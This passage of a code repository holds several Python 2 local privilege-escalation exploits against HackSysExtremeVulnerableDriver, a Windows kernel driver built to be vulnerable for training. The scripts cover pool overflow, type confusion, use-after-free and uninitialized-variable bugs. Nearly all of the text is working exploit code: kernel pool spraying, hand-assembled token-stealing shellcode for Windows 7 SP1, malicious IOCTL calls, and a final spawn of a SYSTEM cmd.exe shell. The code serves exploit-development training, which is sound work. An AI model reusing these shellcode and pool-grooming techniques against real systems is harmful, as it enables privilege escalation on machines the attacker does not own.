ntdll.ZwDeviceIoControlFile(driver_handle, 124 | None, 125 | None, 126 | None, 127 | byref(IoStatusBlock), 128 | IOCTL_VULN, 129 | inputbuffer, 130 | inputbuffer_size, 131 | None, 132 | 0x0 133 | ) 134 | 135 | if 'system' in os.popen('whoami').read(): 136 | print "[+] Getting system shell..." 137 | os.system("cmd.exe") 138 | else: 139 | print '[-] Failed to elevate privileges' -------------------------------------------------------------------------------- /HEVD/hacksysPOOL-kex.py: -------------------------------------------------------------------------------- 1 | from kex import * 2 | from ctypes import * 3 | from ctypes.wintypes import * 4 | import os 5 | 6 | #EXPLOIT 7 | 8 | if __name__ == '__main__': 9 | print "[*] HackSysExtremeVulnerableDriver pool overflow privilige escalation" 10 | 11 | IOCTL_VULN = ctl_code(0x803) # 12 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 13 | dwReturn = c_ulong() 14 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 15 | 16 | required_hole_size = 0x200 17 | good_object = find_object_to_spray(required_hole_size) 18 | #allocate input 19 | size = 0x1F8 + len(pool_overwrite(required_hole_size,good_object)) 20 | input = 0x1F8 * "\x42" + pool_overwrite(required_hole_size,good_object) 21 | alloc_memory(0x41410000, input, size) 22 | 23 | #alloc pointer to CloseProcedure 24 | stuff = "\x42\x42\x42\x42" 25 | alloc_memory(0x00000060, stuff, 0x4) 26 | 27 | #allocate shellcode in memory 28 | SHELLCODE = tokenstealing(RETVAL = "") 29 | stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (size - 0x10 - len(SHELLCODE)) 30 | alloc_memory(0x42424242, stuff, size) 31 | 32 | #spray the heap with EventObjects 33 | gimme_the_hole(required_hole_size) 34 | 35 | inputbuffer = 0x41410000 #memory address of the input buffer 36 | inputbuffer_size = size 37 | outputbuffer_size = 0x0 38 | IoStatusBlock = c_ulong() 39 | if driver_handle: 40 | print "[+] Talking to the driver sending vulnerable IOCTL..." 41 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 42 | None, 43 | None, 44 | None, 45 | byref(IoStatusBlock), 46 | IOCTL_VULN, 47 | inputbuffer, 48 | inputbuffer_size, 49 | None, 50 | 0x0 51 | ) 52 | 53 | print "[+] Getting system shell..." 54 | close_all_handles() 55 | os.system("cmd.exe") -------------------------------------------------------------------------------- /HEVD/hacksysPOOL.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | import os 4 | import struct 5 | 6 | handles = {} 7 | 8 | GENERIC_READ = 0x80000000 9 | GENERIC_WRITE = 0x40000000 10 | OPEN_EXISTING = 0x3 11 | 12 | MEM_COMMIT = 0x00001000 13 | MEM_RESERVE = 0x00002000 14 | PAGE_EXECUTE_READWRITE = 0x00000040 15 | STATUS_SUCCESS = 0 16 | 17 | METHOD_NEITHER = 0x3 18 | FILE_ANY_ACCESS = 0x0 19 | FILE_DEVICE_UNKNOWN = 0x00000022 20 | 21 | 22 | kernel32 = windll.kernel32 23 | ntdll = windll.ntdll 24 | 25 | def ctl_code(function, 26 | devicetype = FILE_DEVICE_UNKNOWN, 27 | access = FILE_ANY_ACCESS, 28 | method = METHOD_NEITHER): 29 | """Recreate CTL_CODE macro to generate driver IOCTL""" 30 | return ((devicetype << 16) | (access << 14) | (function << 2) | method) 31 | 32 | def alloc_memory(base_address, input, input_size): 33 | """ 34 | Allocate input buffer 35 | """ 36 | print "[*] Allocating input buffer at %s" % hex(base_address) 37 | base_address_c = c_int(base_address) 38 | input_size_c = c_int(input_size) 39 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, 40 | POINTER(c_int), 41 | c_ulong, 42 | POINTER(c_int), 43 | c_int, 44 | c_int] 45 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, 46 | byref(base_address_c), 47 | 0x0, 48 | byref(input_size_c), 49 | MEM_RESERVE|MEM_COMMIT, 50 | PAGE_EXECUTE_READWRITE) 51 | if dwStatus != STATUS_SUCCESS: 52 | print "[-] Error while allocating memory: %s" % dwStatus 53 | getLastError() 54 | sys.exit() 55 | written = c_ulong() 56 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, input, len(input), byref(written)) 57 | if alloc == 0: 58 | print "[-] Error while writing our input buffer memory: %s" % alloc 59 | getLastError() 60 | sys.exit() 61 | 62 | def tokenstealingx86(RETVAL, extra = ""): 63 | """ 64 | Retrun a token stealing shellcode 65 | """ 66 | #Windows 7 SP1 x86 67 | KPROCESS = '\x50' 68 | TOKEN = '\xF8' 69 | UPID = '\xB4' 70 | APLINKS = '\xB8' 71 | 72 | shellcode = ( 73 | "\x60" # pushad 74 | "\x33\xc0" # xor eax,eax 75 | "\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] 76 | "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] 77 | "\x8b\xc8" # mov ecx,eax 78 | "\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+APLINKS] 79 | "\x2d" + APLINKS + "\x00\x00\x00" # sub eax,APLINKS 80 | "\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+UPID],0x4 81 | "\x75\xec" # jne 0xe 82 | "\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+TOKEN] 83 | "\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+TOKEN],edx 84 | "\x61" # popad 85 | ) 86 | 87 | shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack 88 | 89 | if RETVAL == "": 90 | shellcode += "\xc3" #retn 91 | else: 92 | shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 93 | 94 | return shellcode 95 | 96 | def spray(): 97 | """Spray the Kernel Pool with Event Objects. Each object 98 | is 0x20 bytes in length and is allocated from the Nonpaged kernel pool""" 99 | global handles 100 | handles = {} 101 | for i in range(0, 50000): 102 | hHandle = HANDLE(0) 103 | hHandle = kernel32.CreateEventA(None, False, False, None) 104 | handles[i]=hHandle 105 | print "[+] Spray done!" 106 | 107 | def make_holes(): 108 | global handles 109 | for i in range(0, 50000,16): 110 | for j in range(0,8): 111 | kernel32.CloseHandle(handles[i + j]) 112 | handles[i + j] = None 113 | print "[+] Making holes done!" 114 | 115 | def free_all(): 116 | print "[*] Triggering shellcode!" 117 | global handles 118 | for i in range(0, 50000): 119 | if (handles[i] != None): 120 | kernel32.CloseHandle(handles[i]) 121 | handles[i] = None 122 | print "[+] Free pool allocations done!" 123 | 124 | def pool_overwrite(): 125 | """ 126 | 857adb40 04080040 ee657645 00000000 00000040 127 | 857adb50 00000000 00000000 00000001 00000001 128 | 857adb60 00000000 0008000c 86f8b180 00000000 129 | 857adb70 00040001 00000000 857adb78 857adb78 130 | """ 131 | pool_header = struct.pack("L", 0x04080040) 132 | pool_header += struct.pack("L", 0xee657645) 133 | pool_header += struct.pack("L", 0x00000000) 134 | pool_header += struct.pack("L", 0x00000040) 135 | pool_header += struct.pack("L", 0x00000000) 136 | pool_header += struct.pack("L", 0x00000000) 137 | pool_header += struct.pack("L", 0x00000001) 138 | pool_header += struct.pack("L", 0x00000001) 139 | pool_header += struct.pack("L", 0x00000000) 140 | 141 | #overwrite type index in object to 0x0 from 0xc 142 | type_index = struct.pack("L", 0x00080000) 143 | 144 | return pool_header + type_index 145 | 146 | #EXPLOIT 147 | 148 | if __name__ == '__main__': 149 | print "[*] HackSysExtremeVulnerableDriver pool overflow privilige escalation" 150 | 151 | IOCTL_VULN = ctl_code(0x803) # 152 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 153 | dwReturn = c_ulong() 154 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 155 | 156 | #allocate input 157 | size = 0x1F8 + len(pool_overwrite()) 158 | input = 0x1F8 * "\x42" + pool_overwrite() 159 | alloc_memory(0x41410000, input, size) 160 | 161 | #alloc pointer to CloseProcedure 162 | stuff = "\x42\x42\x42\x42" 163 | alloc_memory(0x00000060, stuff, 0x4) 164 | 165 | #allocate shellcode in memory 166 | SHELLCODE = tokenstealingx86(RETVAL = "") 167 | stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (size - 0x10 - len(SHELLCODE)) 168 | alloc_memory(0x42424242, stuff, size) 169 | 170 | #spray the heap with EventObjects 171 | spray() 172 | 173 | #make holes on the heap 174 | make_holes() 175 | 176 | inputbuffer = 0x41410000 #memory address of the input buffer 177 | inputbuffer_size = size 178 | outputbuffer_size = 0x0 179 | IoStatusBlock = c_ulong() 180 | if driver_handle: 181 | print "[*] Sending IOCTL and data to the driver..." 182 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 183 | None, 184 | None, 185 | None, 186 | byref(IoStatusBlock), 187 | IOCTL_VULN, 188 | inputbuffer, 189 | inputbuffer_size, 190 | None, 191 | 0x0 192 | ) 193 | 194 | free_all() 195 | if 'system' in os.popen('whoami').read(): 196 | print "[+] Getting system shell..." 197 | os.system("cmd.exe") 198 | else: 199 | print '[-] Failed to elevate privileges' 200 | -------------------------------------------------------------------------------- /HEVD/hacksysTYPE.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | import os 4 | 5 | GENERIC_READ = 0x80000000 6 | GENERIC_WRITE = 0x40000000 7 | OPEN_EXISTING = 0x3 8 | 9 | MEM_COMMIT = 0x00001000 10 | MEM_RESERVE = 0x00002000 11 | PAGE_EXECUTE_READWRITE = 0x00000040 12 | STATUS_SUCCESS = 0 13 | 14 | METHOD_NEITHER = 0x3 15 | FILE_ANY_ACCESS = 0x0 16 | FILE_DEVICE_UNKNOWN = 0x00000022 17 | 18 | 19 | kernel32 = windll.kernel32 20 | ntdll = windll.ntdll 21 | 22 | def ctl_code(function, 23 | devicetype = FILE_DEVICE_UNKNOWN, 24 | access = FILE_ANY_ACCESS, 25 | method = METHOD_NEITHER): 26 | """Recreate CTL_CODE macro to generate driver IOCTL""" 27 | return ((devicetype << 16) | (access << 14) | (function << 2) | method) 28 | 29 | def alloc_memory(base_address, input, input_size): 30 | """ 31 | Allocate input buffer 32 | """ 33 | print "[*] Allocating input buffer at %s" % hex(base_address) 34 | base_address_c = c_int(base_address) 35 | input_size_c = c_int(input_size) 36 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, 37 | POINTER(c_int), 38 | c_ulong, 39 | POINTER(c_int), 40 | c_int, 41 | c_int] 42 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, 43 | byref(base_address_c), 44 | 0x0, 45 | byref(input_size_c), 46 | MEM_RESERVE|MEM_COMMIT, 47 | PAGE_EXECUTE_READWRITE) 48 | if dwStatus != STATUS_SUCCESS: 49 | print "[-] Error while allocating memory: %s" % dwStatus 50 | getLastError() 51 | sys.exit() 52 | written = c_ulong() 53 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, input, len(input), byref(written)) 54 | if alloc == 0: 55 | print "[-] Error while writing our input buffer memory: %s" % alloc 56 | getLastError() 57 | sys.exit() 58 | 59 | def tokenstealingx86(RETVAL, extra = ""): 60 | """ 61 | Retrun a token stealing shellcode 62 | """ 63 | #Windows 7 SP1 x86 64 | KPROCESS = '\x50' 65 | TOKEN = '\xF8' 66 | UPID = '\xB4' 67 | APLINKS = '\xB8' 68 | 69 | shellcode = ( 70 | "\x60" # pushad 71 | "\x33\xc0" # xor eax,eax 72 | "\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] 73 | "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] 74 | "\x8b\xc8" # mov ecx,eax 75 | "\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+APLINKS] 76 | "\x2d" + APLINKS + "\x00\x00\x00" # sub eax,APLINKS 77 | "\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+UPID],0x4 78 | "\x75\xec" # jne 0xe 79 | "\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+TOKEN] 80 | "\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+TOKEN],edx 81 | "\x61" # popad 82 | ) 83 | 84 | shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack 85 | 86 | if RETVAL == "": 87 | shellcode += "\xc3" #retn 88 | else: 89 | shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 90 | 91 | return shellcode 92 | 93 | 94 | if __name__ == '__main__': 95 | print "[*] HackSysExtremeVulnerableDriver type confusion privilige escalation" 96 | 97 | 98 | IOCTL_VULN = ctl_code(0x808) # 99 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 100 | dwReturn = c_ulong() 101 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 102 | 103 | #allocate input 104 | size = 0x1000 105 | input = size * "\x42" #the 2nd 4 byte will point to our shellcode 106 | alloc_memory(0x41410000, input, size) 107 | 108 | #allocate shellcode in memory 109 | SHELLCODE = tokenstealingx86(RETVAL = "") 110 | stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (0x1000 - 0x10 - len(SHELLCODE)) 111 | alloc_memory(0x42424242, stuff, 0x1000) 112 | 113 | inputbuffer = 0x41410000 #memory address of the input buffer 114 | inputbuffer_size = 0x1000 115 | outputbuffer_size = 0x0 116 | IoStatusBlock = c_ulong() 117 | if driver_handle: 118 | print "[*] Sending IOCTL and data to the driver..." 119 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 120 | None, 121 | None, 122 | None, 123 | byref(IoStatusBlock), 124 | IOCTL_VULN, 125 | inputbuffer, 126 | inputbuffer_size, 127 | None, 128 | 0x0 129 | ) 130 | 131 | if 'system' in os.popen('whoami').read(): 132 | print "[+] Getting system shell..." 133 | os.system("cmd.exe") 134 | else: 135 | print '[-] Failed to elevate privileges' -------------------------------------------------------------------------------- /HEVD/hacksysUAF.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | import os 4 | import struct 5 | from ctypes.wintypes import HANDLE, DWORD 6 | 7 | handles = {} 8 | 9 | GENERIC_READ = 0x80000000 10 | GENERIC_WRITE = 0x40000000 11 | OPEN_EXISTING = 0x3 12 | 13 | MEM_COMMIT = 0x00001000 14 | MEM_RESERVE = 0x00002000 15 | PAGE_EXECUTE_READWRITE = 0x00000040 16 | STATUS_SUCCESS = 0 17 | 18 | METHOD_NEITHER = 0x3 19 | FILE_ANY_ACCESS = 0x0 20 | FILE_DEVICE_UNKNOWN = 0x00000022 21 | 22 | 23 | kernel32 = windll.kernel32 24 | ntdll = windll.ntdll 25 | 26 | def ctl_code(function, 27 | devicetype = FILE_DEVICE_UNKNOWN, 28 | access = FILE_ANY_ACCESS, 29 | method = METHOD_NEITHER): 30 | """Recreate CTL_CODE macro to generate driver IOCTL""" 31 | return ((devicetype << 16) | (access << 14) | (function << 2) | method) 32 | 33 | def alloc_memory(base_address, input, input_size): 34 | """ 35 | Allocate input buffer 36 | """ 37 | print "[*] Allocating input buffer at %s" % hex(base_address) 38 | base_address_c = c_int(base_address) 39 | input_size_c = c_int(input_size) 40 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, 41 | POINTER(c_int), 42 | c_ulong, 43 | POINTER(c_int), 44 | c_int, 45 | c_int] 46 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, 47 | byref(base_address_c), 48 | 0x0, 49 | byref(input_size_c), 50 | MEM_RESERVE|MEM_COMMIT, 51 | PAGE_EXECUTE_READWRITE) 52 | if dwStatus != STATUS_SUCCESS: 53 | print "[-] Error while allocating memory: %s" % dwStatus 54 | getLastError() 55 | sys.exit() 56 | written = c_ulong() 57 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, input, len(input), byref(written)) 58 | if alloc == 0: 59 | print "[-] Error while writing our input buffer memory: %s" % alloc 60 | getLastError() 61 | sys.exit() 62 | 63 | def tokenstealingx86(RETVAL, extra = ""): 64 | """ 65 | Retrun a token stealing shellcode 66 | """ 67 | #Windows 7 SP1 x86 68 | KPROCESS = '\x50' 69 | TOKEN = '\xF8' 70 | UPID = '\xB4' 71 | APLINKS = '\xB8' 72 | 73 | shellcode = ( 74 | "\x60" # pushad 75 | "\x33\xc0" # xor eax,eax 76 | "\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] 77 | "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] 78 | "\x8b\xc8" # mov ecx,eax 79 | "\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+APLINKS] 80 | "\x2d" + APLINKS + "\x00\x00\x00" # sub eax,APLINKS 81 | "\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+UPID],0x4 82 | "\x75\xec" # jne 0xe 83 | "\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+TOKEN] 84 | "\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+TOKEN],edx 85 | "\x61" # popad 86 | ) 87 | 88 | shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack 89 | 90 | if RETVAL == "": 91 | shellcode += "\xc3" #retn 92 | else: 93 | shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 94 | 95 | return shellcode 96 | 97 | def spray(): 98 | """Spray the Kernel Pool with IO_COMPLETION_OBJECT. Each object 99 | is 0x60 bytes in length and is allocated from the Nonpaged kernel pool""" 100 | global handles 101 | handles = {} 102 | IO_COMPLETION_OBJECT = 1 103 | for i in range(0, 50000): 104 | hHandle = HANDLE(0) 105 | ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT) 106 | handles[i]=hHandle.value 107 | print "[+] Spray done!" 108 | 109 | def make_holes(): 110 | global handles 111 | for i in range(0, 50000,16): 112 | kernel32.CloseHandle(handles[i]) 113 | handles[i] = None 114 | print "[+] Making holes done!" 115 | 116 | def free_all(): 117 | #print "[+] Triggering shellcode!" 118 | global handles 119 | for i in range(0, 50000): 120 | if (handles[i] != None): 121 | kernel32.CloseHandle(handles[i]) 122 | handles[i] = None 123 | print "[+] Free pool allocations done!" 124 | 125 | 126 | #EXPLOIT 127 | 128 | if __name__ == '__main__': 129 | print "[*] HackSysExtremeVulnerableDriver UAF privilige escalation" 130 | 131 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 132 | dwReturn = c_ulong() 133 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 134 | 135 | #allocate input, this will be copied to fake object 136 | size = 0x58 137 | input = 0x57 * "\x42" + "\x00" 138 | alloc_memory(0x41410000, input, size) 139 | 140 | #allocate shellcode in memory 141 | scsize = 0x100 142 | SHELLCODE = tokenstealingx86(RETVAL = "") 143 | stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (scsize - 0x10 - len(SHELLCODE)) 144 | alloc_memory(0x42424242, stuff, scsize) 145 | 146 | inputbuffer = 0x41410000 #memory address of the input buffer 147 | inputbuffer_size = size 148 | outputbuffer_size = 0x0 149 | IoStatusBlock = c_ulong() 150 | 151 | #spray the heap with EventObjects 152 | spray() 153 | 154 | #make holes on the heap 155 | make_holes() 156 | 157 | 158 | #allocate UAF object 159 | IOCTL_VULN = ctl_code(0x804) #HACKSYS_EVD_IOCTL_ALLOCATE_UAF_OBJECT 160 | if driver_handle: 161 | print "[+] Allocate UAF object..." 162 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 163 | None, 164 | None, 165 | None, 166 | byref(IoStatusBlock), 167 | IOCTL_VULN, 168 | inputbuffer, 169 | inputbuffer_size, 170 | None, 171 | 0x0 172 | ) 173 | 174 | #free UAF object 175 | IOCTL_VULN = ctl_code(0x806) #HACKSYS_EVD_IOCTL_FREE_UAF_OBJECT 176 | if driver_handle: 177 | print "[+] Free UAF object..." 178 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 179 | None, 180 | None, 181 | None, 182 | byref(IoStatusBlock), 183 | IOCTL_VULN, 184 | inputbuffer, 185 | inputbuffer_size, 186 | None, 187 | 0x0 188 | ) 189 | 190 | #allocate fake object 191 | IOCTL_VULN = ctl_code(0x807) #HACKSYS_EVD_IOCTL_ALLOCATE_FAKE_OBJECT 192 | if driver_handle: 193 | print "[+] Allocate plenty of fake objects..." 194 | for i in range(0, 50000,16): 195 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 196 | None, 197 | None, 198 | None, 199 | byref(IoStatusBlock), 200 | IOCTL_VULN, 201 | inputbuffer, 202 | inputbuffer_size, 203 | None, 204 | 0x0 205 | ) 206 | 207 | free_all() 208 | #use UAF object 209 | IOCTL_VULN = ctl_code(0x805) #HACKSYS_EVD_IOCTL_USE_UAF_OBJECT 210 | if driver_handle: 211 | print "[+] Use UAF object..." 212 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 213 | None, 214 | None, 215 | None, 216 | byref(IoStatusBlock), 217 | IOCTL_VULN, 218 | inputbuffer, 219 | inputbuffer_size, 220 | None, 221 | 0x0 222 | ) 223 | 224 | 225 | 226 | if 'system' in os.popen('whoami').read(): 227 | print "[+] Getting system shell..." 228 | os.system("cmd.exe") 229 | else: 230 | print '[-] Failed to elevate privileges' -------------------------------------------------------------------------------- /HEVD/hacksysUIHEAP.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | import os 4 | import struct 5 | 6 | handles = {} 7 | 8 | GENERIC_READ = 0x80000000 9 | GENERIC_WRITE = 0x40000000 10 | OPEN_EXISTING = 0x3 11 | 12 | MEM_COMMIT = 0x00001000 13 | MEM_RESERVE = 0x00002000 14 | PAGE_EXECUTE_READWRITE = 0x00000040 15 | STATUS_SUCCESS = 0 16 | 17 | METHOD_NEITHER = 0x3 18 | FILE_ANY_ACCESS = 0x0 19 | FILE_DEVICE_UNKNOWN = 0x00000022 20 | 21 | 22 | kernel32 = windll.kernel32 23 | ntdll = windll.ntdll 24 | 25 | def ctl_code(function, 26 | devicetype = FILE_DEVICE_UNKNOWN, 27 | access = FILE_ANY_ACCESS, 28 | method = METHOD_NEITHER): 29 | """Recreate CTL_CODE macro to generate driver IOCTL""" 30 | return ((devicetype << 16) | (access << 14) | (function << 2) | method) 31 | 32 | def alloc_memory(base_address, input, input_size): 33 | """ 34 | Allocate input buffer 35 | """ 36 | print "[*] Allocating input buffer at %s" % hex(base_address) 37 | base_address_c = c_int(base_address) 38 | input_size_c = c_int(input_size) 39 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, 40 | POINTER(c_int), 41 | c_ulong, 42 | POINTER(c_int), 43 | c_int, 44 | c_int] 45 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, 46 | byref(base_address_c), 47 | 0x0, 48 | byref(input_size_c), 49 | MEM_RESERVE|MEM_COMMIT, 50 | PAGE_EXECUTE_READWRITE) 51 | if dwStatus != STATUS_SUCCESS: 52 | print "[-] Error while allocating memory: %s" % dwStatus 53 | getLastError() 54 | sys.exit() 55 | written = c_ulong() 56 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, input, len(input), byref(written)) 57 | if alloc == 0: 58 | print "[-] Error while writing our input buffer memory: %s" % alloc 59 | getLastError() 60 | sys.exit() 61 | 62 | def tokenstealingx86(RETVAL, extra = ""): 63 | """ 64 | Return a token stealing shellcode 65 | """ 66 | #Windows 7 SP1 x86 67 | KPROCESS = '\x50' 68 | TOKEN = '\xF8' 69 | UPID = '\xB4' 70 | APLINKS = '\xB8' 71 | 72 | shellcode = ( 73 | "\x60" # pushad 74 | "\x33\xc0" # xor eax,eax 75 | "\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] 76 | "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] 77 | "\x8b\xc8" # mov ecx,eax 78 | "\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+APLINKS] 79 | "\x2d" + APLINKS + "\x00\x00\x00" # sub eax,APLINKS 80 | "\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+UPID],0x4 81 | "\x75\xec" # jne 0xe 82 | "\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+TOKEN] 83 | "\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+TOKEN],edx 84 | "\x61" # popad 85 | ) 86 | 87 | shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack 88 | 89 | if RETVAL == "": 90 | shellcode += "\xc3" #retn 91 | else: 92 | shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 93 | 94 | return shellcode 95 | 96 | def spray(): 97 | """Spray the Kernel Pool with mutant name.""" 98 | global handles 99 | handles = {} 100 | for i in range(1, 10000): 101 | hHandle = HANDLE(0) 102 | hHandle = kernel32.CreateMutexA(None, False, "\x46" * ((0xF0-10)/2) + str(i).zfill(4)) 103 | if hHandle == None: 104 | print "[-] Error while creating mutex" 105 | getLastError() 106 | sys.exit() 107 | handles[i]= hHandle 108 | print "[+] Spray done!" 109 | 110 | def make_holes(): 111 | global handles 112 | for i in range(1, 10000,16): 113 | kernel32.CloseHandle(handles[i]) 114 | handles[i] = None 115 | print "[+] Making holes done!" 116 | 117 | def free_all(): 118 | #print "[+] Triggering shellcode!" 119 | global handles 120 | for i in range(1, 10000): 121 | if (handles[i] != None): 122 | kernel32.CloseHandle(handles[i]) 123 | handles[i] = None 124 | print "[+] Free pool allocations done!" 125 | 126 | 127 | if __name__ == '__main__': 128 | print "[*] HackSysExtremeVulnerableDriver uninitialized heap variable privilige escalation" 129 | 130 | #allocate input, this will be copied to fake object 131 | size = 0x4 132 | input = struct.pack("L", 0xbad0b0b1) 133 | alloc_memory(0x41410000, input, size) 134 | 135 | #allocate shellcode in memory 136 | scsize = 0x1000 137 | SHELLCODE = tokenstealing(RETVAL = "") 138 | stuff = "\x90" * 0x100 + SHELLCODE + "\x90" * (scsize - 0x100 - len(SHELLCODE)) 139 | alloc_memory(0x00460000, stuff, scsize) 140 | 141 | inputbuffer = 0x41410000 #memory address of the input buffer 142 | inputbuffer_size = size 143 | outputbuffer_size = 0x0 144 | IoStatusBlock = c_ulong() 145 | 146 | #spray the heap with EventObjects 147 | spray() 148 | 149 | #make holes on the heap 150 | make_holes() 151 | 152 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 153 | dwReturn = c_ulong() 154 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 155 | IOCTL_VULN = ctl_code(0x80c) #HACKSYS_EVD_IOCTL_UNINITIALIZED_HEAP_VARIABLE 156 | 157 | if driver_handle: 158 | print "[*] Sending IOCTL and data to the driver..." 159 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 160 | None, 161 | None, 162 | None, 163 | byref(IoStatusBlock), 164 | IOCTL_VULN, 165 | inputbuffer, 166 | inputbuffer_size, 167 | None, 168 | 0x0 169 | ) 170 | free_all() 171 | 172 | if 'system' in os.popen('whoami').read(): 173 | print "[+] Getting system shell..." 174 | os.system("cmd.exe") 175 | else: 176 | print '[-] Failed to elevate privileges' 177 | -------------------------------------------------------------------------------- /HEVD/hacksysUISTACK.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | import os 4 | 5 | GENERIC_READ = 0x80000000 6 | GENERIC_WRITE = 0x40000000 7 | OPEN_EXISTING = 0x3 8 | 9 | MEM_COMMIT = 0x00001000 10 | MEM_RESERVE = 0x00002000 11 | PAGE_EXECUTE_READWRITE = 0x00000040 12 | STATUS_SUCCESS = 0 13 | 14 | METHOD_NEITHER = 0x3 15 | FILE_ANY_ACCESS = 0x0 16 | FILE_DEVICE_UNKNOWN = 0x00000022 17 | 18 | 19 | kernel32 = windll.kernel32 20 | ntdll = windll.ntdll 21 | 22 | def ctl_code(function, 23 | devicetype = FILE_DEVICE_UNKNOWN, 24 | access = FILE_ANY_ACCESS, 25 | method = METHOD_NEITHER): 26 | """Recreate CTL_CODE macro to generate driver IOCTL""" 27 | return ((devicetype << 16) | (access << 14) | (function << 2) | method) 28 | 29 | def alloc_memory(base_address, input, input_size): 30 | """ 31 | Allocate input buffer 32 | """ 33 | print "[*] Allocating input buffer at %s" % hex(base_address) 34 | base_address_c = c_int(base_address) 35 | input_size_c = c_int(input_size) 36 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, 37 | POINTER(c_int), 38 | c_ulong, 39 | POINTER(c_int), 40 | c_int, 41 | c_int] 42 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, 43 | byref(base_address_c), 44 | 0x0, 45 | byref(input_size_c), 46 | MEM_RESERVE|MEM_COMMIT, 47 | PAGE_EXECUTE_READWRITE) 48 | if dwStatus != STATUS_SUCCESS: 49 | print "[-] Error while allocating memory: %s" % dwStatus 50 | getLastError() 51 | sys.exit() 52 | written = c_ulong() 53 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, input, len(input), byref(written)) 54 | if 